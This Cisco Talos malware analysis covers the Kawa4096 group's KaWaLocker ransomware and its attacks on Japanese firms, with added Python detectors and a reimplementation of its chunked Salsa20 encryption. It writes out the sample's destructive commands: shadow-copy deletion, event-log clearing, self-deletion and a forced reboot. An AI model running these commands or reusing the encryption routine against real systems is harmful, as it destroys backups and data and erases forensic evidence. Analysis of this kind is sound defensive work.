Following Qilin, three groups — Lynx, Nightspire, and RansomHub — accounted for three incidents each. Regarding RansomHub, attacks targeting Japan were also confirmed around the same time in 2024. Groups such as Akira, Cicada3301, Gunra, Kawa4096 and Space Bears were each responsible for two incidents. In particular, Kawa4096, which began operations in late June 2025, has targeted Japan from the outset, warranting special attention.

Other groups with one confirmed incident each include Black Suit, CLOP, Devman, Fog and Play, among others.

Figure 4. Identified ransomware employed in attacks.

Spotlight: Kawa4096 ransomware group

Trustwave published a useful analysis report on Kawa4096 in July 2025.

The ransomware group first posted about a victim organization on its leak site, shown in Figure 5, on June 19, 2025. Subsequently, it disclosed information believed to pertain to attacks on two Japanese companies on June 26 and June 28.

Figure 5. Kawa4096 leak site.

KaWaLocker ransomware deployed by Kawa4096

Config File

The ransomware used by this group, shown in Figure 6, loads a configuration file from its resource section with the FindResourceW API, as illustrated in Figure 7. The configuration defines the file extensions, directories and specific folders to exclude from encryption, the processes and services to terminate, and commands to execute. In the example configuration shown in the figure, the command to be executed via WMI is defined as <cmd_post value="calc">, which launches the calculator. Since the calculator is only launched after encryption, the entry is probably a check that the configuration was applied correctly. Depending on the value set, arbitrary commands can be executed: in other configuration files, Talos has confirmed a forced reboot after encryption via the command shutdown /r /t 0.

Figure 6. Loading RCDATA101 from the resource section.
Figure 7. Part of the configuration file defined in RCDATA101.

Creating new file extensions and icons

The file extension appended to encrypted files is also taken from a value loaded from the resource section, just like the configuration file. Specifically, the ransomware skips the first 8 bytes of the loaded resource and uses the next 9 bytes as the new extension.

Figure 8. Loading RCDATA102 from the resource section.
Figure 9. Part of RCDATA102.

Once the extension name for the encrypted files is determined, an icon file used after encryption is created at the following path using the CreateFileW API:


C:\Users\Public\Documents\.C3680868C.ico

After that, a new key named “.C3680868C” is created under “HKEY_LOCAL_MACHINE\Software\Classes” in the registry, with a subkey DefaultIcon whose value is set to the path of the icon mentioned above.

Figure 10. Registration of a custom file extension.
Figure 11. Encrypted file.
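The extension derivation and the icon/registry artifacts described above, written out as an added example (not Talos’s code and not the malware’s): it takes a constructed RCDATA102-style blob, applies the “skip 8 bytes, take 9” rule, produces the icon path and registry key the sample writes, and adds a small check a responder could run over exported Classes keys to flag that pattern. The 8 placeholder bytes in front of the extension and the benign comparison entry are assumptions; the extension value C3680868C is the one from the Talos sample.

```python
"""KaWaLocker extension derivation and the artifacts it produces.
Added example; the resource blob is constructed (leading 8 bytes are a placeholder)."""
import re

ICON_DIR = r"C:\Users\Public\Documents"
CLASSES_ROOT = r"HKEY_LOCAL_MACHINE\Software\Classes"

# Constructed RCDATA102-like blob: 8 placeholder bytes, the 9-byte extension seen in
# the Talos sample, then some trailing data.
SAMPLE_RCDATA102 = b"\x02\x00\x00\x00\x09\x00\x00\x00" + b"C3680868C" + b"\x00" * 7


def extension_from_resource(blob: bytes) -> str:
    """Skip 8 bytes, take the next 9 as the extension (returned without the dot)."""
    if len(blob) < 17:
        raise ValueError("resource too short to contain an extension")
    raw = blob[8:17]
    if not re.fullmatch(rb"[A-Za-z0-9]{9}", raw):
        raise ValueError(f"unexpected extension bytes: {raw!r}")
    return raw.decode("ascii")


def artifacts_for(ext: str) -> dict:
    """Icon path and registry key/value the sample writes for a given extension."""
    dotted = "." + ext
    key = CLASSES_ROOT + "\\" + dotted
    return {
        "icon_path": ICON_DIR + "\\" + dotted + ".ico",
        "registry_key": key,
        "default_icon_key": key + "\\DefaultIcon",
    }


_KEY_RE = re.compile(
    r"HKEY_LOCAL_MACHINE\\Software\\Classes\\(\.[A-Za-z0-9]{9})\\DefaultIcon", re.I)
_ICON_RE = re.compile(
    r"^C:\\Users\\Public\\Documents\\(\.[A-Za-z0-9]{9})\.ico$", re.I)


def looks_like_kawalocker_registration(key_path: str, default_icon_value: str) -> bool:
    """True when Classes\\.<9-char ext>\\DefaultIcon points at an .ico in Public
    Documents whose file name is the extension itself, the pattern seen above."""
    m_key = _KEY_RE.fullmatch(key_path.strip())
    m_val = _ICON_RE.match(default_icon_value.strip().strip('"'))
    return bool(m_key and m_val and m_key.group(1).lower() == m_val.group(1).lower())


if __name__ == "__main__":
    ext = extension_from_resource(SAMPLE_RCDATA102)
    art = artifacts_for(ext)
    print("extension:", "." + ext)
    for name, value in art.items():
        print(f"{name}: {value}")
    print("flagged:", looks_like_kawalocker_registration(art["default_icon_key"], art["icon_path"]))
```

The check deliberately keys on the combination (Public Documents location, icon named after the extension, nine alphanumeric characters) rather than on the single extension seen in this sample, since the extension is read from the resource and can differ per build.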

Types of arguments

This ransomware checks for the presence of the -all argument on startup (Figure 12).

Figure 12. Argument check.

Below is a summary of the three arguments:

  • -all: Executes the ransomware’s processing using multithreading
  • -d: Encrypts only the specified directory
  • -dump: Uses the MiniDumpWriteDump API to create a .dmp file containing crash or runtime information in the execution folder

When the -all option is not specified, the ransomware re-executes itself as “%ws” -all using the CreateProcessW API. Additionally, only when -all is not specified, the ransomware creates a Mutex named “SAY_HI_2025” using the CreateMutexA API to check whether it is already running.

Figure 13. Creation of Mutex value.

Ransom note

A ransom note named “!!Restore-My-file-Kavva.txt,” as shown in Figure 14, is created in C: and in each encrypted folder. The note primarily states that the system has been encrypted and that important data has been stolen, which is typical of double-extortion ransomware, and warns that the data will be published if the victim refuses to communicate. It also lists the types of data involved, such as employees’ personal information and customer information, to pressure the victim into initiating contact.

Figure 14. KaWaLocker ransom note.

Data deletion

After file encryption, the following commands are executed to hinder recovery and forensics: volume shadow copies are deleted and the Security, System and Application event logs are cleared.

vssadmin.exe Delete Shadows /all /quiet
vssadmin.exe delete shadows /all /quiet
wmic shadowcopy delete /nointeractive
cmd.exe /c wevtutil cl security | wevtutil cl system | wevtutil cl application

Depending on the configuration settings, the program may also delete itself.

cmd.exe /C ping 127.0.0.1 -n 2 > nul && del /F
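Detection logic for the cleanup commands listed above, and for cmd_post values such as the forced reboot mentioned in the configuration section, as an added example rather than Talos’s own coverage. The process-creation events are constructed, their line format (timestamp, host=, image=, cmd="...") is an assumption, and the del target path in the self-delete sample is invented because the command on the page is cut off after del /F.

```python
"""Detect KaWaLocker's post-encryption cleanup commands in process-creation events.
Added example; the event format and the sample events are constructed."""
import re
from collections import defaultdict

# One rule per behaviour from the analysis: (tag, regex over the command line).
# Case-insensitive because the sample runs both "Delete Shadows" and "delete shadows".
RULES = [
    ("vssadmin_delete_shadows",
     re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b.*?/all\b", re.I)),
    ("wmic_shadowcopy_delete",
     re.compile(r"\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b", re.I)),
    ("wevtutil_clear_log",
     re.compile(r"\bwevtutil(?:\.exe)?\s+cl\s+(?:security|system|application)\b", re.I)),
    ("ping_then_del_self_delete",
     re.compile(r"\bping\s+127\.0\.0\.1\s+-n\s+\d+\b.*&&\s*del\s+/F\b", re.I)),
    ("forced_reboot",  # a cmd_post value Talos observed in other configurations
     re.compile(r"\bshutdown(?:\.exe)?\s+/r\s+/t\s+0\b", re.I)),
]

# Assumed line format: <timestamp> host=<name> image=<path> cmd="<command line>"
EVENT_RE = re.compile(
    r'^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+image=(?P<image>\S+)\s+cmd="(?P<cmd>.*)"$')

# Constructed events: one infected file server, one admin listing shadows legitimately.
# The del target path is invented; the page's command ends at "del /F".
SAMPLE_EVENTS = r"""
2025-06-26T01:12:03Z host=JP-FS01 image=C:\Windows\System32\vssadmin.exe cmd="vssadmin.exe Delete Shadows /all /quiet"
2025-06-26T01:12:03Z host=JP-FS01 image=C:\Windows\System32\wbem\WMIC.exe cmd="wmic shadowcopy delete /nointeractive"
2025-06-26T01:12:04Z host=JP-FS01 image=C:\Windows\System32\cmd.exe cmd="cmd.exe /c wevtutil cl security | wevtutil cl system | wevtutil cl application"
2025-06-26T01:12:05Z host=JP-FS01 image=C:\Windows\System32\shutdown.exe cmd="shutdown /r /t 0"
2025-06-26T01:12:09Z host=JP-FS01 image=C:\Windows\System32\cmd.exe cmd="cmd.exe /C ping 127.0.0.1 -n 2 > nul && del /F C:\Users\Public\kw.exe"
2025-06-26T01:15:00Z host=JP-WS07 image=C:\Windows\System32\vssadmin.exe cmd="vssadmin list shadows"
"""


def match_command_line(cmd: str) -> list:
    """Tags of every rule that fires on a single command line."""
    return [tag for tag, rx in RULES if rx.search(cmd)]


def scan_events(lines) -> dict:
    """Group rule hits per host. Returns {host: sorted distinct tags}; hosts with no
    hits are absent. Lines that do not parse are skipped rather than guessed at."""
    hits = defaultdict(set)
    for line in lines:
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        for tag in match_command_line(m["cmd"]):
            hits[m["host"]].add(tag)
    return {host: sorted(tags) for host, tags in hits.items()}


def verdict(tags) -> str:
    """Escalate when backup destruction and log clearing occur on the same host;
    either alone is worth a look but also has legitimate admin uses."""
    wiped_backups = {"vssadmin_delete_shadows", "wmic_shadowcopy_delete"} & set(tags)
    cleared_logs = "wevtutil_clear_log" in tags
    if wiped_backups and cleared_logs:
        return "critical: ransomware post-encryption cleanup"
    if wiped_backups or cleared_logs:
        return "high: investigate"
    return "none"


if __name__ == "__main__":
    for host, tags in scan_events(SAMPLE_EVENTS.strip().splitlines()).items():
        print(host, verdict(tags), tags)
```

Because the event-log clearing is chained in one cmd.exe command line, matching on the command line rather than on the image name is what catches it; a rule keyed on wevtutil.exe as the process image would see three child processes of cmd.exe instead, depending on how the sensor records them.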

Encryption

The chunk size, and with it the number of chunks, is chosen from the size of the target file. Files of 10MB or less are not split and are encrypted as a single block. Larger files are divided into chunks whose size varies with the file size, as shown in Figure 15; the base chunk size is the value stored at offset a1 + 488 in the decompiled code, 0x10000 (64KB). Figure 16 tabulates the chunk size for each file-size range. Processing large files in chunks speeds up encryption.

Figure 15. Code section that determines the number of chunks based on the file size.
Figure 16. File size and chunk size correspondence table.

Once the chunk count is determined, the target data is encrypted using the Salsa20 stream cipher.

Figure 17. Encryption method.
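An added, illustrative reimplementation (not the malware’s code) of the chunked Salsa20 scheme described above: files at or below the split threshold are handled as one chunk, larger files are cut into chunks whose size grows with the file size, and each chunk is encrypted independently with a keystream counter derived from its byte offset, so the chunks can be handed to a thread pool, which is presumed here to be how the -all multithreaded mode uses them. The chunk-size tiers above the 10MB threshold are an assumption standing in for Figure 16, Salsa20 is implemented in pure Python from Bernstein’s specification, and the threshold and base chunk size are parameters so the example runs quickly on small inputs.

```python
"""Chunked Salsa20 encryption in the style described for KaWaLocker.
Added example; the chunk-size tiers above the threshold are an ASSUMPTION."""
import struct
from concurrent.futures import ThreadPoolExecutor

MASK = 0xFFFFFFFF
SIGMA = struct.unpack("<4I", b"expand 32-byte k")   # Salsa20 constants for 256-bit keys
SPLIT_THRESHOLD = 10 * 1024 * 1024                  # files <= 10MB are not split (from the analysis)
BASE_CHUNK = 0x10000                                # 64KB base chunk size (from the analysis)


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def _qr(a, b, c, d):
    """Salsa20 quarter-round."""
    b ^= _rotl((a + d) & MASK, 7)
    c ^= _rotl((b + a) & MASK, 9)
    d ^= _rotl((c + b) & MASK, 13)
    a ^= _rotl((d + c) & MASK, 18)
    return a, b, c, d


def salsa20_block(key, nonce, counter):
    """One 64-byte Salsa20/20 keystream block (256-bit key, 64-bit nonce, 64-bit counter)."""
    k = struct.unpack("<8I", key)
    n = struct.unpack("<2I", nonce)
    st = [SIGMA[0], k[0], k[1], k[2], k[3], SIGMA[1], n[0], n[1],
          counter & MASK, (counter >> 32) & MASK,
          SIGMA[2], k[4], k[5], k[6], k[7], SIGMA[3]]
    x = st[:]
    for _ in range(10):                                            # 10 double-rounds
        x[0], x[4], x[8], x[12] = _qr(x[0], x[4], x[8], x[12])     # column round
        x[5], x[9], x[13], x[1] = _qr(x[5], x[9], x[13], x[1])
        x[10], x[14], x[2], x[6] = _qr(x[10], x[14], x[2], x[6])
        x[15], x[3], x[7], x[11] = _qr(x[15], x[3], x[7], x[11])
        x[0], x[1], x[2], x[3] = _qr(x[0], x[1], x[2], x[3])       # row round
        x[5], x[6], x[7], x[4] = _qr(x[5], x[6], x[7], x[4])
        x[10], x[11], x[8], x[9] = _qr(x[10], x[11], x[8], x[9])
        x[15], x[12], x[13], x[14] = _qr(x[15], x[12], x[13], x[14])
    return struct.pack("<16I", *[(a + b) & MASK for a, b in zip(x, st)])


def salsa20_xor(key, nonce, data, offset=0):
    """XOR data with the keystream starting at byte `offset` (64-byte aligned).
    Salsa20 is a stream cipher, so the same call encrypts and decrypts."""
    if offset % 64:
        raise ValueError("offset must be a multiple of the 64-byte block size")
    out = bytearray(len(data))
    for i in range(0, len(data), 64):
        ks = salsa20_block(key, nonce, (offset + i) // 64)
        for j, b in enumerate(data[i:i + 64]):
            out[i + j] = b ^ ks[j]
    return bytes(out)


def chunk_size_for(file_size, base=BASE_CHUNK, threshold=SPLIT_THRESHOLD):
    """Chunk size by file-size tier. At or below the threshold the whole file is one
    chunk; the multipliers above it are assumed, standing in for the Figure 16 table."""
    if file_size <= threshold:
        return file_size
    if file_size <= 10 * threshold:
        return base
    if file_size <= 100 * threshold:
        return 4 * base
    return 16 * base


def chunk_plan(file_size, base=BASE_CHUNK, threshold=SPLIT_THRESHOLD):
    """(offset, length) pairs covering the file; the last chunk may be short."""
    size = chunk_size_for(file_size, base, threshold)
    if size == 0:
        return []
    return [(off, min(size, file_size - off)) for off in range(0, file_size, size)]


def encrypt_chunks(key, nonce, data, base=BASE_CHUNK, threshold=SPLIT_THRESHOLD, workers=4):
    """Encrypt every chunk independently on a thread pool. The keystream counter is
    derived from the chunk offset, so chunk order does not matter and the result equals
    one straight Salsa20 pass over the file. Calling it again decrypts."""
    plan = chunk_plan(len(data), base, threshold)
    out = bytearray(len(data))

    def work(item):
        off, ln = item
        return off, salsa20_xor(key, nonce, data[off:off + ln], off)

    with ThreadPoolExecutor(max_workers=workers) as pool:
        for off, ct in pool.map(work, plan):
            out[off:off + len(ct)] = ct
    return bytes(out)


if __name__ == "__main__":
    key, nonce = bytes(range(32)), b"KaWa2025"          # demo key material (constructed)
    sample = bytes(range(256)) * 12                      # 3072 bytes, a scaled-down "large file"
    ct = encrypt_chunks(key, nonce, sample, base=64, threshold=1024)
    print(len(chunk_plan(len(sample), base=64, threshold=1024)), "chunks; round trip ok:",
          encrypt_chunks(key, nonce, ct, base=64, threshold=1024) == sample)
```

Deriving the counter from the byte offset is what makes the chunks independent: a thread can encrypt chunk 37 without knowing anything about chunk 36, which is the property a multithreaded mode needs. For recovery work it also means a decryptor only has to know the key, nonce and chunk layout, not the order in which the threads finished.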

KaWaLocker 2.0

We also observed KaWaLocker 2.0 in late July 2025, which suggests the attackers may deploy this malware even more actively in the future. One of the main changes is the ransom note, which differs from the initial version of KaWaLocker. As shown in Figure 18, the KaWaLocker 2.0 ransom note includes a newly added email contact.

Figure 18. KaWaLocker2.0 ransom note.

Another change concerns the configuration: KaWaLocker 2.0 adds a flag called “hide_name.”

Figure 19. KaWaLocker config (left), KaWaLocker 2.0 config (right).

When this flag is enabled, the file is renamed as well as encrypted: the new name is derived from a hash of the file’s absolute path, so the original name is no longer visible after encryption.

Figure 20. Encrypted file when the hide_name flag is enabled.

Coverage

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless, transparent and secure access to the internet, cloud services or private applications no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.

ClamAV detections are also available for this threat:

  • Win.Ransomware.KaWaLocker-10056371-0

Indicators of compromise (IOCs)

The IOCs can also be found in our GitHub repository here.

Cisco Talos Blog – ​Read More